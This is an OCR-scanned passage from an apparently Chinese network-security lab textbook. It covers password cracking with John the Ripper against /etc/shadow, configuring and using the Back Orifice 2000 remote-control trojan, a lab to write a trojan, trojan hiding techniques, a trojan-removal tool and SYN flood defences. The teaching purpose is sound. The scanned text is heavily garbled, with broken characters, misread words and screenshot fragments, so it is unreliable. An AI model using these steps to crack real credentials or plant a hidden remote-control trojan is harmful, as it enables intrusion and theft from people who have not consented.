openbsd-a Ipha OpenBSD, Alpha 

openbsd-spar c64 OpenBSD, SPARC 64-bit (best) 

openbsd-sparc OpenBSD, SPARC 32-bit 

openbsd-ppc32 OpenBSD, PowerPC 32-bit 


"type" [已 转换 ] 72L, 3712C 


167. 在 vi 中 查看 type 文件 内 容 


网 络 攻防 m 


1,1 DE 


(8) 编译 源 文 件 : make clean linux-x86-any (这 里 linux-x86-any 是 操作 系统 版 本 ， 
可 以 根据 图 16-7 选择 合适 的 版 本 ， 如 果 没 有 合适 的 版 本 可 以 使 用 generic 代替 )。 

(9) 然后 输入 命令 ed .Jrun， 进 入 run HKF, WE 16-8 所 示 。 输 入 命令 开始 破解 
Linux 密码 ， 应 用 程序 应 该 能 够 很 快 获得 在 前 面 创建 的 密码 。 
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[root@locathost run]f ./john /etc/shadow ` 
Loaded 6 password hashes with 6 different salts (FreeBSD MX [32/32]) 


123456 (root) 
123456 (whu) 
123456 (iszhou) 
prelude (wordsworth) 
ode (keats) 
图 16-8 口令 破解 
up Æ 
[ 实验 报 A ] 


详细 叙述 实验 过 程 ， 通 过 在 系统 中 添加 不 同安 全 强度 的 口令 ， 测 试 安全 口令 的 
条 件 。 


【思考 题 】 
比较 Linux 下 口令 安全 与 Windows 下 口令 安全 机 制 的 异同 点 。 


162 “木马 攻击 与 防范 


16.2.1 木马 的 安装 及 使 用 


【实验 目的 】 
熟悉 木马 的 原理 和 使 用 方法 ， 学 会 配置 服务 器 端 及 客户 端的 程序 。 
【原理 简介 】 


特洛伊 木马 是 一 种 非常 危险 的 恶性 程序 ， 它 无 休止 地 穷 取 用 户 的 信息 ， 从 而 给 用 户 
造成 了 巨大 的 损失 。“ 特 洛 伊 木马 ”〈Trojan Horse) 简称 “木马 ”， 据 说 这 个 名 称 来 源 
于 希腊 神话 《木马 屠城 记 》。 特 洛 伊 木马 是 一 种 恶意 程序 ， 它 们 悄悄 地 在 宿主 机 器 上 运 
行 ， 就 在 用 户 毫 无 察觉 的 情况 下 ， 让 攻击 者 获得 了 远程 访问 和 控制 系统 的 权限 。 一 般 而 
言 ， 大 多 数 特 洛 伊 木马 都 模仿 一 些 正规 的 远程 控制 软件 的 功能 ， 如 Symantec 的 
pcAnywhere， 但 特洛伊 木马 也 有 一 些 明显 的 特点 ， 例 如 它 的 安装 和 操作 都 是 在 隐蔽 之 中 
完成 。 攻 击 者 经 常 把 特洛伊 木马 隐藏 在 一 些 游戏 或 小 软件 之 中 ， 诱 使 粗心 的 用 户 在 自己 
的 机 器 上 运行 。 最 常见 的 情况 是 ， 上 当 的 用 户 要 么 从 不 正规 的 网 站 下 载 和 运行 了 带 恶 意 
代码 的 软件 ， 要 么 不 小 心 打开 了 带 恶 意 代码 的 邮件 附件 。 

大 多 数 特洛伊 木马 包括 客户 端 和 服务 器 端 两 个 部 分 。 攻 击 者 利用 一 种 称 为 绑 定 程序 
的 工具 将 服务 器 部 分 绑 定 到 某 个 合法 软件 上 ， 诱 使 用 户 运行 合法 软件 。 只 要 用 户 一 运行 
软件 ， 特 洛 伊 木 马 的 服务 器 部 分 就 在 用 户 毫 无 知觉 的 情况 下 完成 了 安装 过 程 。 通 常 ， 特 
洛 伊 木马 的 服务 器 部 分 都 是 可 以 定制 的 ， 攻 击 者 可 以 定制 的 项 目 一 般 包括 服务 器 运行 的 
卫 端口 号 、 程 序 启 动 时 机 、 如 何 发 出 调用 、 如 何 隐 身 、 是 否 加 密 等 。 另 外 ， 攻 击 者 还 可 
以 设置 登录 服务 器 的 密码 、 确 定 通信 方式 。 特 洛 伊 木马 攻击 者 既 可 以 随心 所 欲 地 查看 已 
被 入 侵 的 机 器 ， 也 可 以 用 广播 方式 发 布 命令 ， 指 示 所 有 在 它 控制 之 下 的 特洛伊 木马 一 起 
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行动 ， 或 者 向 更 广泛 的 范围 传播 ， 或 者 做 其 他 危险 的 事情 。 

特洛伊 木马 比 任何 其 他 恶意 代码 都 要 和 危险， 要 保障 安全 ， 最 好 的 办 法 就 是 熟悉 特 洛 
伊 木马 的 类 型 、 工 作 原 理 ， 掌 握 如 何 检 测 和 预防 这 些 不 怀 好 意 的 代码 。 

常见 的 特洛伊 森马， 例如 Back Orifice 和 SubSeven 等 ， 都 是 多 用 途 的 攻击 工具 包 ， 
功能 非常 全 面 ， 包 括 捕 获 屏幕 、 声 音 、 视 频 内 容 的 功能 。 这 些 特 洛 伊 木 马 可 以 当做 键 记 
录 器 、 远 程控 制 器 、FTP 服务 器 、HTTP 服务 器 、Telnet 服务 器 ,还 能 够 寻找 和 窃取 密码 。 
攻击 者 可 以 配置 特洛伊 木马 监听 的 端口 、 运 行 方式 ， 以 及 木马 是 否 通过 E-mail. IRC 或 
其 他 通信 手段 联系 发 起 攻击 的 人 。 一 些 危害 大 的 特洛伊 木马 还 有 一 定 的 反 侦 测 能 力 ， 能 
够 采取 各 种 方式 隐藏 自身 ， 加 密 通 信 ， 甚 至 提供 了 专业 级 的 API 供 其 他 攻击 者 开发 附加 
的 功能 。 由 于 功能 全 面 ,所 以 这 些 特洛伊 木马 的 体积 也 往往 较 大 , 通常 达到 100—300 KB, 
相对 而 言 ， 要 把 它们 安装 到 用 户 机 器 上 而 不 引起 任何 人 注意 的 难度 也 较 大 。 

对 于 功能 比较 单一 的 特洛伊 木马 ， 攻 击 者 会 力图 使 它 保持 较 小 的 体积 ， 通 常 是 10 一 
30KB， 以 便 快 速 激活 而 不 引起 注意 。 这 些 木马 通常 作为 键 记 录 器 使 用 ， 它 们 把 受害 用 户 
的 每 一 个 键 击 事件 记录 下 来 ， 保 存 到 某 个 隐藏 的 文件 ， 这 样 攻击 者 就 可 以 下 载 文件 分 析 
用 户 的 操作 了 。 还 有 一 些 特洛伊 木马 具有 FTP, Web 或 聊天 服务 器 的 功能 。 通 常 ， 这 些 
微型 的 木马 只 用 来 窃取 难以 获得 的 初始 远程 控制 能 力 ， 保 障 最 初 入 侵 行 动 的 安全 ， 以 便 
在 不 太 可 能 引起 注意 的 适当 时 机 上 载 和 安装 一 个 功能 全 面 的 大 型 特洛伊 木马 。 

木马 程序 中 最 著名 的 当 属 Back Orifice (BO2K)， 它 以 多 功能 、 代 码 简洁 而 著称 ， 并 
且 由 于 BO2K 操作 简单 ， 只 要 简单 地 点 击 鼠 标 即 可 ， 即 使 最 不 熟练 的 黑客 也 可 以 成 功 地 
引诱 用 户 安装 Back Orifice。 只 要 用 户 安装 了 Back Orifice， 黑 客 几 乎 就 可 以 为 所 欲 为 了 ， 
像 非法 访问 敏感 信息 、 修 改 和 删除 数据 ， 甚 至 可 以 改变 系统 配置 。 


【实验 环境 】 
Windows 操作 系统 ， 网 络 环境 ，BO2000。 


【实验 步骤 】 

1. BO2000 的 安装 

BO2000 一 般 都 是 以 压缩 文件 在 网 上 发 布 的 。 下 载 并 解压 后 打开 即 可 看 到 三 个 执行 
文件 ， BO2K.exe、BO2Kcfg.exe 和 BO2Kgui.exe。 其 中 BO2K.exe 就 是 那个 危险 的 木马 ， 
如 果 用 户 在 系统 中 看 到 这 个 文件 ， 那 就 要 尽快 删除 掉 。 如 果 没 有 并 不 表明 系统 中 没有 木 
马 程序 ， 黑 客 一 般 情况 下 都 会 改名 称 ， 而 且 该 程序 仅 需 执行 一 次 。 

2. 服务 器 端 程序 的 配置 

(D 运行 BO2Kcfg.exe， 打 开 配 置 向 导 ， 如 图 16-9 所 示 。 

(2) 单 击 Next 按钮 ， 如 图 16-10 所 示 。 默 认 的 服务 器 文件 是 BO2K.exe。 如 果 用 户 
把 它 改名 了 ， 就 输入 修改 以 后 的 文件 名 。 然 后 单 击 Next 按钮 进入 第 三 步 。 

(3) 在 第 三 步 中 ， 要 求 选择 服务 器 与 客户 端 通信 的 网 络 协议 ， 如 图 16-11 所 示 ， 有 
两 种 可 供 选择 的 协议 : TCP 和 UDP。 为 了 传输 的 可 靠 性 一 般 选 择 TCP. 
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BO2K Configuration Wizard — Step 1 


BO2K CONFIGURATION WIZARD 


Welcome to the BO2K Configuration 


This wizard will help you install 
components into your BO2K server and 
configure them. First, you'll be asked 
to choose a BO2K server, then we ll walk 
you through the process of configuring 


When you're done, your BO2K server will 
be ready for installation. Note that this 
wizard does not allow for full 
configuration flexibility. It is meant 


IV Show this wizard on st: 


图 16-9 BOOK 配置 向 导 
(4) 在 第 四 步 中 ， 选 择 通信 端 口 。 


BO2K Configuration Wizard — Step 2 


BO2K CONFIGURATION WIZARD 


This step will allow you to choose a server 
file to configure. If you just want to use 
the default BO2K server, simply click 


Choose a BOZK server 
[boZk. exe 


When you have chosen the server file, 


<< Back Next >> 
图 16-10 ”服务 器 文件 配置 


- 般 要 选择 大 于 1024 的 端口 。 因 为 1024 以 下 的 


端口 是 系统 保留 的 ， 有 可 能 被 其 他 程序 使 用 了 ， 如 图 16-12 所 示 。 可 以 指定 服务 器 程序 


监听 的 端口 是 2011。 


BO2K Configuration Wizard - Step 3 


BO2K CONFIGURATION WIZARD 


This step will allow you to choose & 


an unreliable protocol, and that sometimes 
connections may be dropped. Choose TCP 


Network Type 


图 16-11. 通信 协议 


BO2K Configuration Wizard - Step 4 


BO2K CONFIGURATION WIZARD 


To configure the network inteface, we'll 

need to choose a port for this to run on. A 

port is a number between 1 and 65535. 

Yo! Ne Sess aa no 
, to ensure that it doesn't conflic 


Choose a port fou —— 


图 16-12 通信 端口 


(5) 在 第 五 步 中 , 选择 加 密 方式 。 如 图 16-13 所 示 , 有 两 种 加 密 方式 可 供 选择 : XOR 


fil 3DES. XOR 加 密 比较 简单 ， 容易 被 反 向 加 密 ， 而 3DES 相对 比较 复杂 。 


(6) 在 第 六 步 中 ， 设 置 连接 口令 ， 如 图 16-14 所 示 。 该 口令 是 连接 服务 器 时 用 的 。 
如 果 用 户 提供 的 口令 与 服务 器 预 设 的 口令 不 同 ， 则 服务 器 会 拒绝 连接 。 口 令 的 长 度 也 是 
有 要 求 的 ， 如 果 用 户 在 第 五 步 中 选择 了 XOR 的 数据 加 密 形式 ， 那 么 口令 最 短 是 4 位 ; 
如 果 选 择 3DES 加 密 ， 那 么 最 短 要 有 14 位 。 

(7) 最 后 完成 对 服务 器 端 程序 的 配置 。 如 果 用 户 要 查看 或 者 修改 配置 ， 也 可 以 直接 


在 BO2Kcfg.exe 程序 的 主 界面 中 进行 修改 ， 如 图 16-15 所 示 。 在 这 里 可 以 随意 查看 和 修 
改 以 前 的 设置 。 在 BO2Kcfg.exe 程序 的 主 界面 上 还 可 以 进行 一 些 高 级 设置 。 从 左下 角 的 
选项 变量 栏 中 选择 一 项 ， 在 右边 的 New 文本 框 中 填 上 新 值 ， 然 后 单 击 Set Value 按钮 进 
行 修改 。 需 要 注意 的 是 ， 修 改 完毕 后 ， 要 单 击 Open Server 按钮 ， 选 择 BO2K.exe， 并 单 


击 Save Server 来 保存 修改 ， 要 不 然 所 做 的 修改 ， 是 不 会 被 写 进 BO2K.exe 文件 的 。 
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BO2K Configuration Wizard 一 Step 5 


BO2K CONFIGURATION WIZARD 


This step will allow you to choose an 
encryption method. Currently, you can choose 
between two different types of encryption, 


XOR is meant only for non-critical 
communications, while 3DES is meant for 
secure strong private communications. 3DES 
is only available in the US version of the 
product due to our country s ignorant and 

Encryption Type 

© XE 

c 


图 16-13 加密 配置 


Y'BO2K Server Configuration 


Current Server 


Server Info: 
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BO2K Configuration Wizard - Step 6 


BO2K CONFIGURATION WIZARD 


Now we need to choose an encryption key for 
your communications. The key is a password 
or passphrase that you will have to remember 
in order to connect to the server. 

I£ you chose ’XOR encryption, your 
password should be at least 4 characters 
long. If you chose "3DES' encryption, you 
password should be at least 14 characters 


Enter your password/passphrase 
[netror 


Number of T 


< Back Next >> 


图 16-14 认证 口令 


Plugin Name Ver.. 


BO2K Ver | Description 


c 


3. 客户 端 程序 的 使 用 
假设 服务 器 端 程序 已 在 192.168.9.135 上 运行 了 ,客户 端 程序 首先 要 做 的 就 是 连接 到 
远程 计算 机 。 双 击 BO2Kguiexe 文件 ， 选 择 Plugins|Configuration 菜单 项 ， 则 弹出 如 


图 16-16 所 示 的 对 话 框 ， 插 入 bo_peer.dll 并 设置 TCP 端 


“network”. 


parm] 


Back Orifice 2000 Server Configuration Utility, Copyright (C) 1999, Cult of 


图 16-15 服务 器 配置 信息 


为 2011，XOR 的 口令 为 


设置 结束 后 ， 从 File 菜单 中 选择 New Server 命令 。 在 弹出 的 对 话 框 中 输入 计算 机 的 


描述 、 地 址 和 端 
单 击 Connect 按钮 ， 如 图 16-18 所 示 ， 连 接 到 BO2000 的 服务 器 。 如 果 设 置 都 正确 ， 


ir. 


号 ， 如 图 16-17 所 示 。 


连接 成 功 。 否 则 BO 就 会 显示 无 法 连接 到 指定 的 计算 机 。 
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Plugin Configuration 


Plugins 
Plugin Name Ver... | BO2K Ver | Description 
MhCMocmen.. 0.7 — 1.0 BO2K Remote Console Manager 


Se Insert Renove 
日 TCPIO 


Current 
123 Default Port [network 
+ @ wrI0 
=| (Eg xor 
Aec XOR Key 
|G B0 Peep 


New 
[network 


c 


图 16-16 插件 配置 


Edit Server Settings 


Edit these Back Orifice server 
properties to modify the server 
list. Choose appropriate 
connection type, encryption and 
Nane of this 


Server 
192. 168. 19. 135:2011 


Connection 


TCPIO: Back Orifice TCP IO Module v1.0 v | 
Default 


XOR: BO2K Simple XOR Encryption 
Authenticati 


NULLAUTK: Single User / Encrypt Only v] 


图 16-17 编辑 服务 器 


Server Command Client 


Server Nane: my server & 
a Sinple C | Addr: 192. 168. 19. 135:2011 


* @ System TERPIN 厂 Allow Docking 
(CJ Key Logging IV Auto-Query 

@ or 

(Z3 TCP/IP 

(NS Networking 

(Gi Process Control 

(CJ Registry 5 

E Multimedia x 

(Gi File/Directory 

E Compression 

S ms 

E Server Control 

@ Legacy Buttplugs SS 

Server 


+ E E EE. 


Clear Responses 


图 16-18 远程 控制 
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在 该 控制 台 上 ， 可 以 从 左边 的 列表 框 中 选择 要 远程 执行 的 命令 ， 然 后 单 击 Send 
Command 按钮 。 执 行 结果 显示 在 底部 的 文本 框 中 。BO 里 有 70 多 条 命令 , 这 些 命 令 用 来 
在 服务 器 上 搜集 数据 和 控制 服务 器 。 


【实验 报告 】 
(1) 详细 描述 实验 过 程 ， 分 析 通 过 BO2K 可 以 对 远程 计算 机 实施 哪些 操作 。 
(2) 通过 任务 管理 器 等 常规 工具 检查 BO2K， 分 析 BO2K 采取 了 哪些 隐藏 技术 。 


【思考 题 】 
利用 第 12 章 主机 监控 所 提供 的 工具 对 BO2K 进行 监测 ， 分 析 发 现 木 马 的 可 能 途径 。 


16.2.2 木马 实现 


【实验 目的 】 
掌握 木马 设计 的 原理 和 关键 技术 。 


【原理 简介 】 

木马 程序 技术 发 展 至 今 , 已 经 经 历 了 4 代 。 第 一 代 ， 即 是 简单 的 密码 窃取 、 发 送 等 ， 
没有 什么 特别 之 处 。 第 二 代 木 马 ， 在 技术 上 有 了 很 大 的 进步 ， 冰 河 可 以 说 是 国内 木马 的 
典型 代表 之 一 。 第 三 代 木 马 在 数据 传递 技术 上 ， 又 做 了 不 小 的 改进 ， 出 现 了 ICMP 等 类 
型 的 木马 ， 利 用 畸形 报 文 传递 数据 ， 增 加 了 查 杀 的 难度 。 第 四 代 木 马 在 进程 隐藏 方面 ， 
做 了 大 的 改动 , 采用 了 内 核 插入 式 的 嵌入 方式 , 利用 远程 插入 线程 技术 , 嵌入 DLL 线程 。 
或 者 挂 接 PSAPI， 实 现 木 马 程序 的 隐藏 ， 甚 至 在 Windows NT/2000 下 ， 都 达到 了 良好 的 

木马 程序 的 服务 器 端 ， 为 了 避免 被 发 现 ， 多 数 都 要 进行 隐藏 处 理 ， 下 面 来 看 看 木马 
是 如 何 实现 隐藏 的 。 想 要 隐藏 木马 的 服务 器 端 ， 可 以 是 伪 隐 藏 ， 也 可 以 是 真 隐藏 。 伪 隐 
藏 ， 就 是 指 程序 的 进程 仍然 存在 ， 只 不 过 是 让 它 消失 在 进程 列表 里 。 真 隐藏 则 是 让 程序 
彻底 地 消失 ， 不 以 一 个 进程 或 者 服务 的 方式 工作 。 

伪 隐 藏 的 方法 ， 是 比较 容易 实现 的 ， 只 要 把 木马 服务 器 端的 程序 注册 为 一 个 服务 就 
可 以 了 ， 这 样 ， 程 序 就 会 从 任务 列表 中 消失 了 ， 因 为 系统 不 认为 它 是 一 个 进程 ， 当 按 下 
Ctrl+Alt+Delete 组 合 键 的 时 候 , 也 就 看 不 到 这 个 程序 。 但 是 , 这 种 方法 只 适用 于 Windows 
9x 的 系统 ， 对 于 Windows NT. Windows 2000 等 ， 通 过 服务 管理 器 ， 一 样 会 发 现在 系统 
中 注册 过 的 服务 。 难 道 伪 隐藏 的 方法 就 真 的 不 能 用 在 Windows NT/2000 上 了 吗 ? 当然 还 
有 办 法 ， 那 就 是 API 的 拦截 技术 ， 通 过 建立 一 个 后 台 的 系统 钩子 ， 拦 截 PSAPI 的 
EnumProcessModules 等 相关 的 函数 来 实现 对 进程 和 服务 的 遍历 调用 的 控制 ， 当 检测 到 进 
FEID (PID) 为 木马 程序 的 服务 器 端 进程 的 时 候 直 接 跳 过 ， 这 样 就 实现 了 进程 的 隐藏。 


【实验 环境 】 
Windows 环境 ，VC++ 开 发 环境 。 


【实验 步骤 】 
参考 BOOK 源码 ，http://www.bo2k.com/software/index.html， 实 现 一 个 木马 程序 ， 使 
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得 攻击 者 能 通过 远程 对 目标 主机 进行 控制 。 


【实验 报告 】 

(1) 描述 木马 程序 所 应 用 的 关键 技术 。 

(2) 实验 所 开发 木马 的 远程 控制 功能 。 

【思考 题 】 

根据 木马 程序 所 使 用 的 技术 ， 分 析 如 何 防范 木马 攻击 。 


16.2.3 ”木马 防范 工具 的 使 用 


【实验 目的 】 
掌握 木马 防范 的 原理 和 关键 技术 。 
【原理 简介 】 


为 了 防止 用 户 发 现 自己 ， 木 马 程序 会 想 尽 一 切 办 法 隐藏 自己 ， 主 要 途径 有 : 在 任务 
栏 中 隐藏 自己 ， 这 是 最 基本 的 ， 只 要 把 Form 的 Visible 属性 设 为 False、ShowInTaskBar 
设 为 False, 程序 运行 时 就 不 会 出 现在 任务 栏 中 了 。 在 任务 管理 器 中 隐形 : 将 程序 设 为 “ 系 
统 服 务 ” 可 以 伪装 自己 。 当 然 它 也 会 悄 无 声息 地 启动 ， 木 马 会 在 每 次 用 户 启动 时 自动 装 
载 服务 端 ，Windows 系统 启动 时 自动 加 载 应 用 程序 的 方法 ， 木 马 都 会 用 上 ， 如 启动 组 、 
win.ini、system.ini、 注 册 表 等 都 是 木马 藏身 的 好 地 方 。 

目前 除了 上 面 介绍 的 隐身 技术 外 ， 更 隐蔽 的 方法 已 经 出 现 ， 那 就 是 驱动 程序 及 动态 
链接 库 技术 。 驱 动 程序 及 动态 链接 库 技术 和 一 般 的 木马 不 同 ， 它 基本 上 摆脱 了 原 有 的 木 
马 模 式 监听 端口 ， 而 采用 替代 系统 功能 的 方法 (改写 驱动 程序 或 动态 链接 库 )。 这 样 做 的 
结果 是 系统 中 没有 增加 新 的 文件 (所 以 不 能 用 扫描 的 方法 查 杀 )、 不 需要 打开 新 的 端口 (所 
以 不 能 用 端口 监视 的 方法 查 杀 )、 没 有 新 的 进程 (所 以 使 用 进程 查看 的 方法 发 现 不 了 它 ， 
也 不 能 用 kil 进程 的 方法 终止 它 的 运行 )。 在 正常 运行 时 木马 几乎 没有 任何 的 症状 ， 而 一 
旦 木马 的 控制 端 向 被 控 端 发 出 特定 的 信息 后 ， 隐 藏 的 程序 就 立即 开始 运作 。 

知道 了 木马 的 攻击 原理 和 隐身 方法 ， 就 可 以 采取 措施 进行 防御 了 。 

1. 端口 扫描 

端口 扫描 是 检查 远程 机 器 有 无 木马 的 最 好 办 法 ， 端 口 扫 描 的 原理 非常 简单 ， 扫 描 程 
序 尝 试 连接 某 个 端口 , 如 果 成 功 ,， 则 说 明 端 口 开放 , 如 果 失 败 或 超过 某 个 特定 的 时 间 GER 
时 )， 则 说 明 端口 关闭 。 但 对 于 驱动 程序 /动态 链接 森马， 扫描 端口 是 不 起 作用 的 。 

2. 查看 连接 

查看 连接 和 端口 扫描 的 原理 基本 相同 ， 不 过 是 在 本 地 机 上 通过 netstat -a RENE 
三 方程 序 ) 查看 所 有 的 TCP/UDP 连接 ， 查 看 连接 要 比 端口 扫描 快 ， 但 同样 是 无 法 查 出 
驱动 程序 /动态 链接 木马 ， 而 且 仅 能 在 本 地 使 用 。 

3. 检查 注册 表 

上 面 在 讨论 木马 的 启动 方式 时 已 经 提 到 ， 木 马 可 以 通过 注册 表 启 动 ( 现 在 大 部 分 的 
木马 都 是 通过 注册 表 启 动 的 , 至 少 也 把 注册 表 作为 一 个 自我 保护 的 方式 ), 那么 同样 可 以 
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通过 检查 注册 表 来 发 现 木 马 在 注册 表 里 留 下 的 痕迹 。 

4. 查找 文件 

查找 木马 特定 的 文件 也 是 一 个 常用 的 方法 ， 木 马 的 一 个 特征 文件 是 kernl32.exe, 5j 
一 个 是 sysexlprexe， 只 要 删除 了 这 两 个 文件 ， 木 马 就 已 经 不 起 作用 了 。 如 果 只 是 删除 了 
sysexlprexe 而 没有 做 扫尾 工作 ， 可 能 会 遇 到 一 些 麻 烦 ， 那 就 是 文本 文件 打 不 开 了 ， 
sysexplrexe 是 和 文本 文件 关联 的 ， 还 必须 把 文本 文件 与 Notepad 关联 上 。 

另外 , 对 于 驱动 程序 /动态 链接 库 木 马 , 有 一 种 方法 可 以 试 试 , 即使 用 Windows 的 “ 系 
统 文件 检查 器 ”， 通 过 【开始 】|【 程 序 】|【 附 件 】|【 系 统 工 具 】|【 系 统 信息 】|【 工 具 】 
可 以 运行 “系统 文件 检查 器 ”用 “系统 文件 检查 器 ”可 检测 操作 系统 文件 的 完整 性 ， 如 
果 这 些 文件 损坏 ， 检 查 器 可 以 将 其 还 原 ， 检 查 器 还 可 以 从 安装 盘 中 解压 缩 已 压缩 的 文件 
〈 如 驱动 程序 )。 如 果 驱 动 程序 或 动态 链接 库 在 没有 升级 它们 的 情况 下 被 改动 了 ， 就 有 可 
能 是 木马 (或 者 损坏 了 )， 提 取 改 动 过 的 文件 可 以 保证 系统 安全 和 稳定 。 

为 了 对 付 日 益 增 加 的 木马 攻击 ， 普 通 的 杀毒 软件 也 加 入 了 对 木马 的 查 杀 ， 很 多 公司 
开发 了 针对 木马 的 清除 工具 , 其 中 微软 的 Malicious Software Removal Tool 就 是 这 样 一 款 
工具 ， 专 门 用 于 清除 包括 木马 在 内 的 恶意 软件 。 

The Cleaner 是 Moosoft Development 公司 推出 的 一 款 专 用 于 清除 特洛伊 木马 的 工具 ， 
内 置 3093 个 木马 标识 。 可 在 线 升 级 版 本 和 病毒 数据 库 ， 操 作 简 单 ， 功 能 强大 。 查 杀 的 各 
类 特洛伊 木马 种 类 最 多 ， 如 Netspy、BO、Netbus、Girlfriend、Happy99、BackDoor 以 
及 它们 的 一 些 不 同 版 本 。 

【实验 环境 】 

Windows 系统 ，The Cleaner 软件 。 

【实验 步骤 】 

(1) The Cleaner 下 载 与 安装 。 从 MOOSOFT 公司 主页 Chttp://www.moosoft.com) 下 
载 The Cleaner 最 新 版 本 〈 本 教材 采用 The Cleaner 2012 V8)， 并 根据 提示 进行 安装 。 

(2) 扫描 与 监控 。 由 于 新 版 本 的 The Cleaner 比较 智能 化 ， 很 多 参数 不 需要 用 户 去 刻意 设 
置 ， 启 动 The Cleaner 主 程序 后 直接 单 击 按钮 使 用 。 可 以 看 到 扫描 的 界面 ， 如 图 16-19 所 示 。 
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= Full Scan conpletely scans the drives you select. 
图 16-19 扫描 过 程 
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(3) 查看 结果 并 处 理 。 扫描 结束 以 后 , 会 跳出 查看 Report 的 提示 对 话 框 , 进入 Report 
界面 可 以 看 到 哪些 程序 被 感染 木马 ， 如 图 16-20 所 示 。 在 该 界面 中 可 以 选择 “修复 被 感 
染 的 程序 “保存 报告 “清空 报告 ”和 “将 所 有 加 入 白 名 单 (Whitelist)”， 并 且 被 处 
理 的 文件 会 在 Quarantine 中 保存 。 
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图 16-20 查看 扫描 报告 


(4) 设置 “ 白 名 单 "。“ 白 名 单 ” 是 与 “ 黑 名单 ” 所 对 应 的 概念 ， 用 户 可 以 通过 “ 添 
加 文件 “添加 文件 夹 “删除 ”和 “清空 ”来 编辑 “ 白 名 单 ”， 如 图 16-21 所 示 。 
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图 16-21 编辑 “ 白 名 单 ” 


(5) 选项 设置 。 可 以 在 Options resins 警报 声音 等 选项 ， 如 图 16-22 所 示 。 
(6) 查看 日 志 记 录 ， 可 以 在 Log 中 查看 并 编辑 日 志 记录 ， 如 图 16-23 所 示 。 


【实验 报告 】 
详细 叙述 实验 过 程 ， 分 析 清 除 木马 的 主要 工作 原理 。 


【思考 题 】 
根据 BO2K 代码 分 析 ， 试 设计 一 个 软件 能 够 检测 和 清除 BO2K 系列 木马 程序 
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图 16-23 ”查看 并 编辑 日 志 记录 


163 ”拒绝 服务 攻击 与 防范 


在 网 络 安全 攻击 的 各 种 手段 和 方法 中 ，DoS (Denial of Service， 拒 绝 服务 类 ) 攻击 
危害 巨大 ， 这 种 攻击 行动 使 网 站 服务 器 充斥 大 量 要 求 回 复 的 信息 ， 消 耗 网 络 带 宽 或 系统 
资源 ， 导 致 网 络 或 系统 不 胜 负 荷 以 至 于 瘫痪 而 停止 提供 正常 的 网 络 服务 。 而 DDoS 
(Distributed Denial of Service， 分 布 式 拒 绝 服务 ) 攻击 的 出 现 无 疑 是 一 场 网 络 的 灾难 ， 它 
是 DoS 攻击 的 演变 和 升级 ， 是 黑客 手中 惯用 的 攻击 方式 之 一 ， 破 坏 力 极 强 ， 往 往 会 带 给 
网 络 致 命 的 打击 ， 因 此 必须 对 其 进行 分 析 和 研究 。 


16.3.1 SYN Flood 攻击 


【实验 目的 】 
熟悉 SYN Flood 的 攻击 原理 与 过 程 ， 及 IPv4 所 存在 的 固有 缺陷 。 
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【原理 简介 】 

SYN Flood 是 当前 最 流行 的 DoS 拒绝 服务 攻击 ) 与 DDoS (分 布 式 拒绝 服务 攻击 ) 
的 方式 之 一 ， 这 是 一 种 利用 TCP 缺陷 ， 发 送 大 量 伪造 的 TCP 连接 请 求 ， 从 而 使 得 被 攻 
击 方 资源 耗 尽 (CPU 满 负 荷 或 内 存 不 足 ) 的 攻击 方式 。 这 种 攻击 的 基本 原理 与 TCP 连接 
建立 的 过 程 有 关 。 

TCP 与 UDP 不 同 ， 它 是 基于 连接 的 ， 建 立 TCP 连接 的 标准 过 程 是 这 样 的 ， 首 先 ， 
请 求 端 (客户 端 ) 发 送 一 个 包含 SYN 标志 的 TCP 报 文 ，SYN 报 文 会 指明 客户 端 使 用 的 
端口 以 及 TCP 连接 的 初始 序号 ， 其 次 ， 服 务 器 在 收 到 客户 端的 SYN 报 文 后 ， 将 返回 一 
个 SYN+ACK 的 报 文 ， 表示 客 户 端的 请 求 被 接受 ， 同 时 TCP 序号 被 加 1，ACK 即 确认 
(Acknowledgement); 最 后 ， 客 户 端 也 返回 一 个 确认 报 文 ACK 给 服务 器 端 ， 同 样 TCP 
序列 号 被 加 1， 到 此 一 个 TCP 连接 完成 。 以 上 的 连接 过 程 在 TCP 中 被 称 为 三 次 握手 
(Three-way Handshake )。 

在 TCP 连接 的 三 次 握手 中 ， 假 设 一 个 用 户 向 服务 器 发 送 了 SYN 报 文 后 突然 死机 或 
掉 线 ， 那 么 服务 器 在 发 出 SYN+ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 报 文 的 (第 
三 次 握手 无 法 完成 )， 这 种 情况 下 服务 器 端 一 般 会 重 试 ( 再 次 发 送 SYN+ACK 给 客户 端 ) 
并 等 待 一 段 时 间 后 丢弃 这 个 未 完成 的 连接 ， 这 段 时 间 的 长 度 称 为 SYN Timeout， 一 般 来 
说 这 个 时 间 是 分 钟 的 数量 级 〈30s 一 2min);， 一 个 用 户 出 现 异 常 导致 服务 器 的 一 个 线程 等 
fi Imin 并 不 是 什么 很 大 的 问题 ， 但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 情况 ， 服 务 
器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列表 而 消耗 非常 多 的 资源 一 数 以 万 计 的 半 连 接 ， 
即使 是 简单 的 保存 并 遍历 也 会 消耗 非常 多 的 CPU 时 间 和 内 存 ， 何 况 还 要 不 断 对 这 个 列 
表 中 的 IP 进行 SYN+ACK 的 重 试 。 实 际 上 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ， 最 后 的 
结果 往往 是 堆栈 溢出 崩溃 一 一 即使 服务 器 端的 系统 足够 强大 , 服务 器 端 也 将 忙于 处 理 攻 
击 者 伪造 的 TCP 连接 请 求 而 无 暇 理 坚 客户 的 正常 请 求 ( 毕 竞 客户 端的 正常 请 求 比率 
非常 之 小 )， 此 时 从 正常 客户 的 角度 看 来 ， 服 务 器 失去 响应 ， 这 种 情况 称 做 服务 器 端 
受到 了 SYN Flood Jil; (SYN 洪水 攻击 )。 从 防御 角度 来 说 ， 有 以 下 几 种 简单 的 解决 
Jk. 

第 一 种 是 缩短 SYN Timeout 时 间 ， 由 于 SYN Flood 攻击 的 效果 取决 于 服务 器 上 保持 
的 SYN 半 连 接 数 ,这 个 值 =SYN 攻击 的 频 度 XSYN Timeout, 所 以 通过 缩短 从 接收 到 SYN 
报 文 到 确定 这 个 报 文 无 效 并 丢弃 改 连 接 的 时 间 ， 例 如 设置 为 20s 以 下 〈 过 低 的 SYN 
Timeout 设置 可 能 会 影响 客户 的 正常 访问 )， 可 以 成 倍 地 降低 服务 器 的 负荷 。 

第 二 种 方法 是 设置 SYN Cookie, 就 是 给 每 一 个 请 求 连 接 的 IP 地 址 分 配 一 个 Cookie， 
